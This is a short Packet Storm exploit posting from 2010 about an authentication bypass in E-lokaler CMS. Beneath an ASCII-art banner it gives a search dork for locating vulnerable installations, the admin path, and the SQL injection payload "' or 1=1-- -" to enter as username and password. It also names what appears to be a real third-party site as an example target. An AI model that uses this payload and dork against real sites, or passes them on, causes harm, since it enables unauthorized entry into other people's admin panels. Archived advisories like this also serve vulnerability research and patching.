E-lokaler CMS SQL Injection

2010-11-26T00:00:00
ID PACKETSTORM:96177
Type packetstorm
Reporter ali_err0r
Modified 2010-11-26T00:00:00

Description

                                        
                                            `   
[]   
_____ .__ .__ ____   
/ _ \ | | | | ___________ ______ / __ \ ______   
/ /_\ \| | | | / __ \_ __ \\_ __ \ / { } \\_ __ \   
/ | \ |_| | \ ___/| | \| | \\// {__} \| \\/   
/\____|__ /____/__}XXXX \___ >__| |__| \ Ti3s /|__|   
\/ \/ \/ \______/   
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++  
++ E-lokaler CMS Authentication Bypass Vulnerability ++  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
Author : ali_err0r  
Date : 2010/11/26  
Dork : intitle"E-lokaler CMS" & ur Imagination   
Version : v.05 - 2  
Tested on : windows 7 64bit  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
POC/xPL  
  
http://target./admin  
  
username : ' or 1=1-- -   
password : ' or 1=1-- -   
  
ex: http://www.seed.elr.dk/admin  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
ali_err0r shObe diGari joZ in ID naDaraD :D  
Ba Tashakor aZ Hame DosTaye IraNi ;)  
dostan: biOxsE , asKNsTR , fx()  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++  
`